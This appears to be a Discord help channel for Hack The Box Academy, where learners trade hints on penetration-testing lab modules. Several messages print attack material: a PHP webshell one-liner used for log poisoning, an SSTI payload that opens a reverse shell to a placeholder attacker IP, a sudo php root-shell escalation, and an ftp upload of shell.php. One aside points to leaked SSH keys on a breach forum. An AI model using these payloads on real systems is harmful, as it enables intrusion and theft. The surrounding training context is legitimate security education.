#modules
maybe connecting to the docker
If the port number after the ip address is longer than a standard port number it is likely using docker. Example, Standard: 0.0.0.0:80; Docker: 0.0.0.0:30303
Hello,
doing the final footprinting test. got into imaps and am trying to read the text of the email in inbox. nothing will display.... im lost. It worked in the example before the tests but not now.
can someone help me please?
hi
sorry i didnt understand the request.
why would i want to hack a discord server? i just wanted some help with a command i dont seem to be inputting correctly...
sorry, i dont have time to look at that right now. i need to finish this problem up. I honestly dont know if i can hack discord lol. i am noob
silence means vindication. Thank you. 🙂
@loud sapphire May I DM you?
sure. no issues here.
not even worth engaging. Until the next issue.
Thank you to those members who DM'd to help me. all fixed now
hi, anyone who has finished Web Attacks module?
Guys
Working on Server Side Attacks - skill assessment, could someone give me a hint ?
idk if it is too hard or I'm just stupid
did you check the source code @woeful oxide?
what's the issue?
can I DM?
sure
sweet
In fact I found something curious in the source code, deobfuscate it
im not sure if deobfuscation bug dig deeper
Found this
this is a bit too much spoiler so if you still have issue with that feel free to dm me
LINUX PRIVILEGE ESCALATION --- Miscellaneous Techniques
Review the NFS server's export list and find a directory holding a flag.
....I am truly stumped on what to do here. I ran the mount -t nfs <IP> /tmp/mnt
and I cant seem to find this flag, probably because I just don't have experience in using NFS in general
Im embarrassed to say it, but I need help 😔
i will dm you
Hello, I am currently on Attacking Common Services - Easy. I got the username and password. I am struggling on uploading file onto \xampp\htdocs. I have tried various methods through the FTP. I cant figure out on what I am missing.
EDIT: latest ftp command:
ftp -u http://<username>:<password>@10.129.98.89/xampp/htdocs/ file:////home/deafsnootz/Desktop/shell.php
Error: ftp: No file after directory (you must specify an output file) `http://fiona:987654321@10.129.98.89/xampp/htdocs/
Am I in the right direction? Thanks in advance! 🙂
[SOLVED] Having problems with the "Remote File Inclusion (RFI) section in the "File Inclusion" module. I'm following the exact steps from the lesson, the reverse shell gets called from the server (http as well as ftp), but the page gives me an error (see screenshot). I tried different ports on my end, respawning, but always get the exact same error. Anyone can make sense of this?
Hello i need help please with the module Attacking Common Services - Hard i found the credentials for F*** and can login via rdp, but i can't login to the mssql server. Maybe i can dm someone for help ?
Hmmm, i found 2 users on the server, but they both have no admin privileges
Found two more users in TestAppDB
Hello i need help for command injection on module WHITEBOX PENTESTING 101: COMMAND INJECTION
i have the payload but i can't escape it 😦
@delicate osprey try to use automatic tools
i tried but does not work
@delicate osprey what tool did you use
i tried jq -aR .
Hi all, im working through Login Brute Forcing - skills assessment - website, and im trying to answer question nr 2. Can anyone give a nudge on what password list i should be using? I think i already found the user but it is taking forever using rockyou.txt
Hi, guys! I'm doing the Attacking Common Services module and I'm a bit stuck on the attacking SQL part. I already got the mssqlsvc password hash and crack it but I'm not quite sure how to enumerate the flagDB table. This server has only 2 users (htbdbuser and sa) and I can't impersonate SA. Can someone lend me a tip on how to approach it?
the flag is in ||flagDB|| databases so try to enum that to dump the flag
if you got the right user the password is in ||rockyou|| but if you still get nothing after a while or get some false positive check your fail string in hydra (the F= thing)
Thanks, will double check the fail string, not 100% sure about the user since it is still taking forever
Guys hot up my rank in hack the box
Dm
submit flags using leaked ssh keys on breachforums 
thx 
I have found the DB but I don't have access to it as the htbdbuser and I can't impersonate the sa user as well
any assistance on Password Attacks - Credential Hunting in Linux. Found Kira's SSH password and am in. Need to find Will's Password
Has anyone solved the File Inclusion Prevention exercise? They're giving 0 cubes for something that doesn't sound simple and I feel like the lesson explains nothing at all to solve this.
So, either I'm missing something here, or this is another case of where they expect you to either magically guess what a possible way to the solution could be, and if you miss it you spend up hours and hours and hours and hours and hours of your life going in the wrong direction. I've done enough of these, I'd like to know if there is a simple and straightforward solution to this that is indeed explained in this actual lesson.
use method show in that section with the ||browser||
Hello, what modules can I choose to start CTF?
I’m having trouble with Linux Privilege Escalation- Kernel Exploits module. I’m struggling with getting the exploit run in htb
@brazen saffron all
can i dm you. having some trouble still
sure
Hi, did you solve this exercise? Im having the same problem, the access.log stops logging when I change the user-agent to the php execution code. Pretty sure its a bug, since there are videos doing that and it works for them. Please help 🙂 no sleep for the last 2 days.. 🙂
if you use duplicate quote for your payload like this <?php system($_GET["cmd"]); ?> change it to single quote like this <?php system($_GET['cmd']); ?>
Yep there is a bug ..
Thanks!!!!! so close but sooo far, hate dont seeing those details :(. Now I can continue
If you make the false req
The whole log will hang up and you have to restart the machine and hope for a changed Ip:Port 😂
@vital adder helped me, it was a fu...cking double quote 😆 . Now it's working with the right one <?php system($_GET['cmd']); ?>
Nice one 😗
Hi, have you been able to solve this by any chance?
Can anyone give a nudge on login brute forcing skill assessment - website question 2, i think i have the right syntax/fail in place but i am starting to doubt if i am using the wrong username.
Think about how to ||disable_functions||
Not the place to talk about that 
hello can you help me with the last section of fundamental windows with the first question which is "What is the name of the group that is present in the Company Data Share Permissions ACL by default?" I have already completed all the only thing missing is, please.
please i need help on his
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
i got access denied while trying to list dir
on what?
password attack module
then you're logging in with the wrong user...
The right one should be fairly obvious!
thanks
i'm using brute force
i got the first user
dm if you want to
I found msf a lot faster for that particular scan
yeah
i used msf
i saw upto five users
the last one have the accessible right
thanks
I started taking the Linux fundamentals module and im having a rough time learning all the commands. is there a step i need to learn before diving into linux or is it just my brainrot?
I'm also doing the linux fundamentals module right now. I find it easy to write down important commands on a notepad for later use. Practise the commands and you'll find them easy to use later on
Your brain is not rot. I first used Linux working with point of sale systems, i legitimately had no idea what I was doing for almost a year.
yeah, there are a LOT of commands in linux, the most important thing to remember is what you can do with commands, you can always look for the answer easily enough when you know what you are looking for
i would encourage you to try and reproduce as many of the sample commands as you can and experiment. And if you aren't sure about how to do something, fall back on your Google-Fu.
and the Discord is here to help too 😉
Yess, We will always be here to help.😊
Unfortunately, drilling Linux commands is not the most exciting or interesting thing in the world. But once proficiency is obtained, your world will open up
You can also run Linux within windows now with no need for a vm so that might give you more opportunity to practice. I would recommend going for debian if you plan to work with things like kali or parrot (don't try to use them as your AV won't like it!)
https://docs.microsoft.com/en-us/windows/wsl/install
when it ask to create the home directory for a new user using options.. what does it mean by options. is it other commands that i have to use to create a home dir?
again thank you for the help. it means a lot being the only person in my family and friend group that loves tech makes it a lil more difficult but its not gonna stop me .
@tardy yew May I DM you?
of course!
feel free to DM me 😉
I was able to get the flag by ||eventually guessing the favorite color||
Did anyone submitted the flag for the final assessment of the sqlmap, and got rejected?
I found the flag but get declined
I haven't done that module, but check the flag is complete and that there's no spaces before or after it
the Skills Assessment? if you still can submit that flag shoot me a dm i'll check your flag
Sent
thanks bro
How do I get around the 403 for the web proxies module for using burp as a web fuzzing tool. I've looked through the headers and I've inspected the page I don't see anything to lead me to the flag
anyone can help with password attack hard lab?
if so, let me know if i can dm. thanks
Which wordlists to use to crack the ||backup||
use the ||mutate password list||
yikes, just stopped it because it was 2% completed after an hour. will run again and go to sleep. thanks
did you use ||bitlocker2john|| then ||grep "bitlocker$0"|| then use hashcat? it shouldn't take that long
I need a nudge on Pivoting, Tunneling, and Port Forwarding: Skills Assessment. I think I may be on the right track, but I'm 100% sure if I am following the right path to get there and I'm struggling a bit.
which part?
The next to last question. Utilizing a common remote access solution to pivot. I got to the first Windows box with the credentials for ||mlefay||. I used ssh -D with ||webadmin|| and it's ||id_rsa||. From there I used ||proxychains|| to ||xfreerdp|| to the box. I was able to upload laZagne and get ||MS Cache|| hashes for ||admin|| and ||vfrank|| as well as other info. For the life of me, though, I can't figure out how to maneuver to the next system, which I am pretty sure is ||172.16.6.35||. Netsh doesn't seem to be doing it, nor do some of the other options.
removed other stuff and left only line starting with ||$bitlocker$0|| now and trying again. my mutated is 94K passwords. did i do something wrong in generating it from the custom.list or it is supposed to be that long?
you're on the path except you got the wrong host, did you run a ||ping sweep|| just like you did on the previous steps? if you did you should find the host you need to rdp to
I did, but I only get responses from ||172.16.5.15|| and ||172.16.5.35||. Ipconfig shows me ||172.16.6.35|| though, which is what made me think that was the right one.
you need to run the ping sweep from the host|| 172.16.6.35 ||or if you've a ||meterpreter|| session you can add route to that network as well then run a ||ping sweep||
Okay, so where I'm struggling is how to pivot to ||172.16.6.35||
Hmmm. I haven't tried ||SocksOverRDP||. Maybe that's it?
ou
Nvm. That seems to not be working. It keeps disconnecting me from my RDP session.
if you've access to ||mlefay host||, you'll find he's connected to the other network, run a|| ping sweep|| from there you'll discover ||another host||, if you did get ||vfrank pass|| you need just to ||rdp|| to that host with the ||vfrank's creds||
I know this is like 5 months off, but god dang i feel stupid. I connected to it previously, but was like nothings showing lmao. for future people remember hidden files im so embarrassed
Ah right, so that's what I thought. Should I be trying to crack the ||MS Cache Hash|| for the pass for ||vfrank|| or am I overly complicating it?
easiest way drop ||mimikatz|| in there and you're good to go
Ahh okay, thanks. I'll try that
94k is the normal after mutation, it'll take less than 30min for that one
ok thanks. will wait and leave you alone. you are very busy 🙂
you can shoot me a dm as well
were you able to get this sorted out? I recall a different section in SQLMap Essentials where it will sometimes spit out the flag with a character or two wrong... But this is the first I have heard of it happening on Skills Assessment
hi, im stuck at DNS footprinting, can anyone help with this , thank youuu
I did, someone helped, there was a wrong character
Thanks!
Feel free to DM me 😊
Hi I need help with linux escalation privilege htb academy training
I have a huge problem with trying to work on a previous module. The LOGIN BRUTE FORCING module when i try and run hydra I keep getting "could not connect to ssh://<IP_ADDR>:22" **Specific IP address.
@heady hamlet use cme tool it works perfect
i think you should use the port provided in the module target instead of 22
Yeah stupid me...
Hi everyone , i'm stuck in module File Inclusion , i was able to see the source of the website and i am trying to poison the Nginx access log with user-agent but it seems to fail , can anyone suggest me ?
Have you tried to poison the session and access the session file then?
Remember that you have to do it twice, first command then you read then another command, because the previous one overwrites the other
Good Morning good people!! Can I get some help with Information Gathering - Web Edition/Active Subdomain Enumeration? I'm having trouble getting the FQDN of the nameserver inlanefreight.htb
Poison environ and see results on log file
Thanks @acoustic owl!
Anyone can help me with uploading file to that certain directory on Attacking Common Services - easy?
EDIT: I managed able to write that directory. Unable to execute the reverse shell. Progress made...
How do I get around the 403 for the web proxies module for using burp as a web fuzzing tool. I've looked through the headers and I've inspected the page I don't see anything to lead me to the flag
Hey everyone
Is windows privilege escalation Vpn down?
It’s going through fatal error somehow
Would you happen to have a screenshot of the flag it was printing out?
maybe try a different vpn?
https://academy.hackthebox.com/vpn
i get this error when trying to load shellcode with python in binary exploitation. can anyone help
Didn't save a screenshot, but DM me if you finished the task - I remember the bad char
My apologies if I am misunderstanding --- are you asking if it's ok to create write ups for Academy modules?
Hello, I am doing the basics academy modules and found a privilege escalation method that I don't understand
Can someone explain it to me? it gives you root access with meterpreter
shell
sudo -l
CMD="/bin/sh"
sudo php -r "system('$CMD');"
shell drops us from meterpreter to a standard linux shell
sudo -l is used to check sudo permissions , which reveals we can run the php binary as sudo
CMD="/bin/sh" we are just setting an environmental variable
the final command we use sudo to run php as the root user, and specifically we use php to run a bourne shell ("/bin/sh")
essentially just spawning a root shell for us.
Thanks, I understand it perfectly now
@light epoch
Using sudo php -r "system('/bin/sh');" would work without setting the env variable?
yes i believe so
i don't see why it wouldnt 😉
of course we could always test to confirm
don't worry, ty
@west canopy do you think we will get some module s in the future or
Anyone mind helping me clarify some stuff on the footprinting academy module, specifically the dns enumeration questions?
yes more modules are coming 🙂 also updates to old modules
@west canopy wow 👌
Yes
I got it solved, didn't realize how to properly use the dig command.
Right, for ||DNS Zone Transfers|| I usually just do: ||dig axfr <subdomain> <IP Address of Target>||
My understanding of what's going on under the hood is kind of fuzzy but I more or less get how it works. If the first zone transfer is successful you can pretty much|| do the same thing again, just trying zone transfers against all discovered subdomains||
Yes for Tier0 modules, writeups and streaming are fine 😉
Obviously we can't stop you from making or distributing write ups for other modules
so if you go that route do us a favor and try to make them as educational as possible
So I figured out how to add .html to each search word but is there a better/shorter list then the seclists common.txt
for standard directory fuzzing i usually use directory-list-2.3-medium-5000.txt
i think common.txt is one of the shorter lists too right?
I'm not sure I can Google it everything I've tried it I get to about 200 words in and it starts to error out on me
What's the point though?
Admittedly this is the first time I properly set it up to add the .html to each entry so maybe it's just best to let it do its thing it just seems so slow bc of burps throttling I prefer gobuster
I did have to search for a write up just today to escalate privileges in the end of a module
My class is struggling with the linux privesc module. So i was thinking about making a write up for it and upload it in my website. @high zinc
Ah i see
Because the module explained how to do it with linpeas or LinEnum but I couldn't execute them in the box pc
Our class have 40 student. Im the only one who solved the whole thing. And even i struggled lol
I just checked its tier2... so no writeups
Where are you all getting stuck?
I remember being stuck on that module for three weeks because of the Privileged Groups section. Don't tell anyone but I might have actually|| bought the module for a friend ||just so he could help me work through it and finish it
Privileged group and the last section.
This are the main modules people are suffering the most.
Other sections as well too
one sec let me DM you 😉
Learned a sick 1liner from him.
+rep
best meme
Hi I was wondering if someone managed to get a reverse shell for the SSTI Example 3 Section, via the command showed in the section itself: {{''.class.mro[1].subclasses()214._module.builtins'import'.popen('python -c 'socket=import("socket");os=import("os");pty=import("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<PENTESTER_IP>",<PENTESTER_PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'').read()}}
Once i got the flag I moved on I think
Hi, I have a problem with the last section of the windows fundamentals module which is "What is the name of the group that is present in the company data sharing permissions ACL by default?" I tried everything creating a group that I am asked to search for all the groups with commands and also in computer management and nothing.... please help me I have been trying everything for several days.
isn't it ||Everyone|| ? 😉
I don't understand
good evening, i need a hint or help please. At the moment i'm working on Pivoting, Tunneling, and Port Forwarding | Skills Assessment. I'm struggling with Question 6 and i think i'm in a while(1) that takes forever. Because i found a Linux server where i can login via ssh. on the Server i found a second network ||172.16.5.15||. I pivot through the linux server via proxychains and rdp on ||172.16.5.35|| with ||mlefay||. Then on the Windows server i found another network ||172.16.6.35|| and i can login via rdp from ||172.16.5.35|| with ||vfrank||. and now im stuck, all the flags on both windows server are the same, i found about 4 flags per server and they are all the same like ||single-piv-blablalba||. Thanks for a hint. It looks like they are both connected with no way out
would be nice if i can dm someone
OMG! Attacking Common Service - Assessment medium is SUPER EASY! I Don't understand why the easy assessment is so hard!
the ||vfrank|| should be the last machine check both of the flag are on there check the ||mounted network drive|| if you can't find them try restart the target machine someone i help have this issue before
the easy one actually have ||2|| way to get the flag so if it isn't hard enough try to find the ||second|| way
please can anyone give me hint on what to do
I'm not there yet..
@foggy light hey cutie
i don't think i did that module yet but which module is that and btw if you need help with something in the htb academy pls provide both the module and section name
I think that i'm both times on the same Microsoft box
wydm?
Hey so I'm on the web proxy module doing the burp intruder section I amended my request to include the .html at the end of each search I'm using the common.txt from seclists the scan is taking too long and the machine shuts down. Is there a way around this a small word list maybe? I did get a few pages throwing a 403 code should I look at those and see if I can manipulate the headers some how
wydm ?
because on both machines the ipconfig table looks exactly the same
oh that's weird
but the rdp session says that i'm definitely on two different networks
try restarted your target machine if you still have this weird issue shoot me a dm i'll help you troubleshoot
once 172.16.5.35 and once 172.16.6.35 i mean i don't know the subnet mask yet but thats something i should check
thanks mate, i will start it again
box if that is a different network
and i tried one more thing, i can create on user ||vfrank/172.16.6.35|| desktop a file and it will show up on ||mlefay/172.16.5.35|| in the vfrank path
if you still stuck feel free to DM me 😉
there is definitely an issue with your target machine or i'm just dumb at AD
can i dm you ? it happens again
it looks like some one shot that bird
gut shot with a slug
That's a dope parrot bg
the theme look great but firefox are missing something
It's a beautiful looking OS.
cool but buggy (so far burp only)
No, I haven't, either. I'm a Kali guy. I'll get around to it eventually.
You should give Zap a try.
The HUD is really nice.
Me too… will take a look at it
yep i did and still not a fan
me too
not some of the new version though
Not clunky
Oh really ?
Is there any special feature in ZAP that burp doesn’t have ?
The HUD
but you could probably do that in burp
Well not probably you definitely could.
yep haven't it that much but just some normal bug
Could be a memory leak from your browser slowing things down rather than burp itself.
It's hard for me to gauge software these days; my computer is a beast.
So i'll have to take your word for that.
we should probably take this conversation to a different channel though
also the new burp for the pwnbox you can't use it with the small pwnbox screen you have to use full screen which is a bit annoying
We're going to get in trouble for being off topic
Yeah 🤣🤣
yep
Good chat though
yeah 🙂
See you around fellows
i know, we run a tight ship here
😆
Can someone direct me to information about how to log in and spawn a system IP from a remote server without a GUI??? lynx isn't providing the button for spawning. So I can't run the slower pw-cracking methods on my fast server. NO GPU at home!!!
Hey guys
Someone can give a hand with the Broken Authentication - Default Credentials?
idk if I need to use Hydra
nope no Hydra, just|| a browser and google|| 🙂
so perhaps jarednexgent is implying "default credentials" might indicate - follow the advice given in the module and "Take the most obvious guess"... heh...
also if we ||right click in firefox and view page source|| we can find some useful information
heya. doing the Using Web Proxies assessment. The 31 char cookie part.
I need to generate a list of potential cookies (32 chars long) using my 31 char captured cookie as a base.
Whats the best/easiest way to generate the list? I am missing something easy here.....
i use the Payload Processing thing in burp intruder
the processor will be used to encode it all back up only tho?
Can i make the processor generate the list and then code it all back up?
no idea what you mean but in burp Payload Processing you can add the single wordlist payload to the first 31 char of the cookie and encode them all
can i dm you a screenie so you can see what i mean please?
sure
Got you guys
I've been overthinking it haha
i did it the low IQ way and manually prepended the 31 character hash to the wordlist
at one point i almost did that too, the burp Payload Processing thing is so confused
i realised with a hint from Mr Tom how to generate the list using burp. Prefix is the 31 chars then encode in payload processor.
I just need to know how to set up the payload position now..... ffs...
i think im winning
Found it
It was in front of my eyes
got it
Hello someone can give me a hint for the exercise "Work on webapp at URL /question2/ and try to bypass the login form using one of the method showed. What is the flag" in BROKEN AUTHENTICATION module. I modified the python script different ways and i cant get it, also i modified the X header
what if instead of using the python script we just ||use something like burp or curl to make a request, and manually add the X header||?
thank you it was helpful, have a good night
Hi all, im currently doing the linux fundamentals, i was hoping to get some advice on what the "format" of the answers need to be in
For the following question:
||What is the path to the htb-student's mail?||
I use the following command
||env | grep mail||
||MAIL=/var/mail/htb-ac588612||
im pretty sure this output contains the answer but can't seem to put it in a format that seems to work?
anyone know if im doing something really dumb?
we need to SSH into the target machine first 😉
looks like you are currently running the command from PwnBox
thanks for the tip ^^ much appreciated ❤️
helppppp, im stuck at DNS footprinting. can anyone help what to do
Dm me 😊
hello
is there any solution to gobuster dns -d command being incredibly slow?
Can someone explain what this thing is?
- CPE credits submission
Hello 👋🏻 Windows Privilege Escalation Module; Interacting with Users section… The techniques in this section aren’t very clear and can’t make them work to obtain the answer for the question, any help?
Try me
What do u mean?
Well, where do you need help?
On the section’s question which asks for the sccm_sec password, also I wasn’t able to replicate the responder part of the section but I’m not sure if it’s related
Hey Guys, who can hint me Windows Privilege Escalation Skills Assessment - Part II - 2nd Question?
I have enumerated vulns but they are too many. Also, I tried follow examples from the module but have no luck.
hi
Good afternoon! Question on Attacking Common Services - Hard. I'm on the RDP, but can't access the SQL server. I've tried all the combinations of credentials but still not having success. I've tried with sqlcmd and using studio. Is there something obvious I'm missing? 😦
Nevermind, I realised that studio was pointing at the wrong server
Hi @hearty walrus , please note that we do not discuss that on this server as it can cause serious damage to the server you are trying to hack into. If you wanna learn hacking, please only hack the machines provided on the htb website. Rule nr 1 of hacking: If you do not know how to do it, then you don't have the permission to do so. Kind regards, thecyberteam
They already got the boot. banned for a very long time
Thx for the update
Hi, can anyone give me a hand at Skills Assessment - File Upload Attacks? I'm stuck
I did it
Ohhhh yeah, finally finished Attacking Common Services. That was an exercise in frustration, but definitely worth it.
Uh why?
When I do a GET request I get it.
Nvm, I guess it's because I did not add the last "/" at the end of the URL.
anyone having trouble accessing the user ||fiona with the correct password on sqsh|| on attacking common services - hard lab. i was about to take some notes, but now i cant access it. Can anyone confirm it is not just me 😓 nvm! i reset the server, its working now
Hey guys. I’m at passwords attacks on network services part. Trying to find the winrm username and don’t have any clue where to start. I was thinking bout using nmap and dig some info and got user named WINSRV, but I think I’m misleading, cause didn’t got any pass with crackmapexec (used rock you files and some more), any ideas?
Trying to brute +userlist
have you looked at the Resources available at the top of the module?
for this module there is a provided username and password list we will need to use
F
Hey, I am stuck in skills assessment - wordpress, i started the machine, ran nmap, dirbuster and wpscan but i can't find any wordpress directories any help?
@rustic sage did you look on all links because one link has WordPress
hi, it's me again with the DNS footprinting, i finally solved the first question, but i cant find the answer for the last one, any hint?
@placid quest from the gobuster output I checked them all
Hey you need to find the zones within the subdomains
oh ya, i got some of it but i cant find the one with octet 203
@rustic sage not on gobuster look at the form of the website it has some links and one link has the WordPress you will need to add it in /etc/hosts
@placid quest oh ok thx
Dm me
i dunno man... i looked around and this ||blog|| page seems interesting 😉
Thx i got it
What exactly do these days mean?
Approximate amount of days to finish this course(?)
I thought so too, but based on what 😄
8 hours a day?
or maybe amount of content it has
Anyone finish the Web Attacks module I can bounce some ideas off of?
sure feel free to dm me
hi, im at SMTP footprinting. How can i find user in it?
use metasploit
i think you can use that but metasploit is faster
ok, im spawning target and tryna use it
Hey so I'm on the web proxy module in the ZAP fuzzed section. I've found the cookie I found what it's hash equal but I can't figure out how to set up the fuzzer so it actually uses the cookie. I've highlighted and right clicked it and selected fuzz but it just brings up my request header.
first don't set the threads too high and you need to use the given wordlist
@wide river change the list of use names
ok, imma set THREADs back to 1 and change new wordlists and see what happen
you mean seclist right ?
Hi, anyone has any idea on how to fix this? It should be as straightforward as it looks i guess..
nope and also that's weird try turning on the verbose
command is exploit -v right?
nope it's set verbose true
wait what wordlist is that?
from the seclist
no use the given one
the one already in the metasploit?
nope the one in the Resources
i only did that part in burp so if you still need help shoot me a dm but i can only help you in burp
Thank you but it is for the zap section I just got through the burp part last night
yeah i did every section in that module with both burp and zap but i forgot this section in zap so i'm trying it right now
I just don't understand how to feed the cookie into the fuzzer I can't modify the header to include it and use it as the attack position I feel like that's the goal
in burp it's so much easier to use intruder
I'll respin my machine and try burp I just wanted to try and do it with zap learn what the goals are. I figured out the hash value by just manually feeding the wordlist through the decoder is there a way to just use that info to directly get the flag I tried feeding it into the url but just got a 404
that list have 101 word why did your end so quick?
that's the cookie you can't feed it to the target url and yes i also doing with zap just to know how to do it
good question, i just leave it there until it done
i do nothing XD
yeah.. that's how brute force works so yes do that
i did that, which is what you see in the picture lol
the whole thing i do was
show smtp_enum
use 0
set RHOSTS
oh wait what, so it just stops?
set USER_FILE
try doing: Import-Module .\SessionGopher.ps1
and let me know if it works
yesssssssssss
he found the issue (missing 1 dot)
if your metasploit randomly stops for no reason then i have no idea
ok, so can you show me how to do it with HELO, EHLO, VRFY
basically stuff in the module?
careful with the spoilers
does anyone have hacks for btd battles
hi i have a question in the module POP3/IMAP. It asks for the organization and i used NMAP to find the result as you see in the picture, but the answer is incorrect, can anyone tell me what i did wrong?
Hey can someone assist me with Web Service & API Assessment? I have gained access via SOAP execute command, but am unsure if this is the correct path or where to go next.. Thanks
also, how to deal with the last 2 questions XD?
has anyone done the broken authentication module? help please
hey, i have a question, how do i level up and stop being a noob? I'm doing the beginner's part and I went to the second stage, but there was no progress...
Wooohoo! Footprinting done!
congratssss
Thanks 🙂
Hey im working on the pivoting forwarding and tunneling module, the RDP and SOCKS Tunneling with SocksOverRDP section says to use proxifier, but the site is down, anybody overcome this?
@thorny stag practice more
Hey can someone assist me with Web Service & API Assessment? I have gained access via SOAP execute command, but am unsure if this is the correct path or where to go next.. Thanks
Every path where you find a vulnerability is the correct path. You should check every possible thing you can do with the vuln you got. If it gives you nothing more then switch. This being said, I have no idea what the module is about but I hope it helps
Good point. Thanks for the approach outlook
Hi everyone!
Who has succeeded in making the CVE-2020-0668 attack from the Kernel Exploits section of the Windows Priv Escalation module?
Where did you get UsoDllLoader.exe / diaghub.exe?
Any tamil people to play HTB together?
Can somebody help me with the Type Filters section of the File Upload Attacks module, i managed to upload the file but i'm getting: cannot be displayed because it contains errors.
try to upload a gif instead of a jpeg
++identify
hey guys... is this the right place to seek help with modules on HTB Academy?
Hello, I am stuck on SERVER-SIDE ATTACKS, SSTI Exploitation Example 1. I can't find the hidden flag. Could someone give me a hint? thanks
I am trying to do the banner grabbing but I do not get it.
Can i dm?
yes it is
guess I'm in the right place... If someone could help me, give me a hint, I would much appreciate it. I'm on File Inclusion (fundamentals), module 23/section253... I have gained RCE through PHP Input Wrapper... the flag should be at / , yet http//IP:PORT/...&cmd=/ does not show anything, while &cmd=id i do get uid=33(www-data)... cmd=pwd i get /var/www/html... any help on this would be highly appreciated
in which module? Because I did stage 1 of level 1, and there was the vip part and I didn't do that part, so I went to stage 2 with 76% in the first, I think... but I didn't level up...
Dm
yea sure
I solved it, but why doesn't os -shell show all output?
@thorny stag Everything takes time
Wrong port :>.
Never mind i solved it
I don't get tplmap installed on a Ubuntu VM.
Good morning good people. Can I get some help with running fierce. I can't seem to get it working.
fierce: error: unrecognized arguments: -dns inlanefreight.htb -wordlist /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt
Try sudo pip ...
Dm me 😊
same error
you should install it in python2
I tried with pip and pip3
python2.7 -m pip install -r requirements.txt
you can execute the python command to check the python version, because pip may also be in python3
Default is Python3
Yes, that is the reason
because "pip" also defaults to python3
So, you can create a virtual python2 environment
then install the tool in virtual environment
okay, I will try
I wanna join a learning team
@placid quest could you teach me how to hack a website? or indicate a site/test to train? or something like that?
Or could I add you? Then we could talk better...
You mean... besides Hack the Box?
uh why?
Add -Pn flag?
Yeah but, I don't have the version.
Because it got filtered.
it is
filtered
Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.
So what can I do to know the version?
No idea, which module/exercise are you doing?
"Getting Started".
best thing to do when asking for help here is to start with that, and then problem
Service Scanning.
I'd possibly check the IP address is correct.
I just tested it, and you should get an open port.
Assuming you are using pwnbox
Can I dm you?
hey guys noob here, am trying to solve the http download with curl but it doesn't seem to work
curl -s -0 http:/[ip]:[port]/download.php
used this command
@pine dagger.
could you help me with the broken authentication module, give me a hint please
It's the same IP.
hey i need some help with the introduction of the academy thing
https://academy.hackthebox.com/storage/modules/15/docker_target1.png
when i type the docker target it says that it took too long to respond and nothing happens idk what to do
ping me if you can help
help me with the broken authentication module please
Morning guys I'm on the web proxy module working through the zap scanner section I've identified the vulnerability I'm using cat to call the .txt file but just getting a blank page nothing when I inspect it or the headers. Can anyone point me in a direction?
Can anyone help me with https://academy.hackthebox.com/module/67/section/630
What is this rank?
From the Academy? Or from HTB?
Hi I have a question. I searched for vulnerability CVE-2021-4034. i used msfconsole, however, i don't know how to get the session id on the attacked host (reverse shell). Does anyone have an idea how to do this?
From the Academy. It's a module on PrivEsc on Windows.
i think its a Discord thing
The home stretch
My question was about posts that have already been deleted. But I can probably help you anyway. DM me
Go Go Go 💪
lol bro i have been stuck for weeks, slow slow progress
lol its just the final bosses left
If you need help, DM me. I've done all of these modules except BloodHound.
Thank you, I will take you up on that
midday tho, morning are for music🥳
No idea what time zone you are in. If I'm online, I can answer you, otherwise you have to wait until I'm online again 😉
hey guys, i need some help on the easy footprinting skill assessment
when i try to connect to the ftp server with the pwnbox i got this error:
on my kali vm i can connect but got weird messages when i try to execute commands
And when i try to download the files with wget the directory is empty
not sure whats going on there 😄
is there any video explanation available for a certain module
dont think so
man..
What exactly did you not understand?
Morning guys I'm on the web proxy module working through the zap scanner section I've identified the vulnerability I'm using cat to call the .txt file but just getting a blank page nothing when I inspect it or the headers. Can anyone point me in a direction?
is parrot terminal the bash terminal?
I normally interact with ftp with the following command: ftp 10.129.227.16
After it can connect, it will ask for creds
Do I need to search somewhere other than ping.php? I've tried just searching for the txt file that way but get a 404, I've looked in the etc/ and I get blank pages. I'm just not sure where to direct the search at this point
does anyone know how to write in community strings for braa? I found the one i needed but i dont know the correct way to write it out. i know that it's <community string>@IP but I'm not sure which part to put in
are you training?
if you mean doing academy footprinting module
yes
yeah
i got an output from onesixtyone for a community string as per the module, but it doesn't say what the correct way to write it in is and any way i try doesn't seem to work
Hi, can i get a nudge on windows privilege escalation skills assessment 1? I have tried all exploits on windows exploit suggester, but none seems to elevate my privileges..
Try whoami /priv
++ identity
i get the above error when running pwn shellcraft amd64.linux.sh -r. I've been stuck on that for 3 days now helpppppp!😭
please point in the right direction for Common Services SQL "What is the password for the "mssqlsvc" user?"
Nevermind. Found the mssqlsvc pass
Can anyone give me a hint for the ACTIVE DIRECTORY ENUMERATION and ATTACKS final assessment part 2, I'm trying to elevate privileges and take over the SQL01, but maybe I'm overthinking.
For SQL01 have a look at the rights with ||whoami /priv||
Thanks...
Hey
Hi, I'm interested in the cyber security community, what do I do to join it??
well between all the servers this one is the softer one in bans
i got perma ban in all other servers
and in this one i got only 10 hours
.............
Hey can someone assist me with Web Service & API Assessment? I have gained access via SOAP execute command, but am unsure if this is the correct path or where to go next..
Is there anyone out there that can offer some guidance on the HTB Academy "CROSS-SITE SCRIPTING (XSS)". Facing issues at session hijacking and skills assessment. None of the suggested payloads seem to be working (for me) and tried a variety of solutions.
Ohhhh yeah! Pivoting module down! o/
Evening! I was able to solve the hard and medium assessments in Attacking Common Services without help. The Easy is the one I can't figure out. I am able to get the file or create a file with a string in it and load it to the C:/xampp/htdocs directory with both methods, ftp and mssql. When I load the site, it gets to "/N" blank and is unable to load the scripts. I tried a reverse-shell script and a webshell script in php. Any hints? Thanks in advance!
If you are able to successfully|| plant a file inside the webroot then you are on the home stretch. With a simple php shell we should be able to get code execution.||
execution of the virus
that is hacking
putting a program in the computer and executing it
without alerting the anti virus
Is anyone able to help me point me in the right direction for Web Service & API Assessment? Thanks
Thank you! I figured out what I did wrong. I wouldn't have this solved without your help sir!
Need help with Common Services Attacking Email. found the user. what tool to crack his password? hydra keeps stopping.
never mind, had to restart and then hydra worked
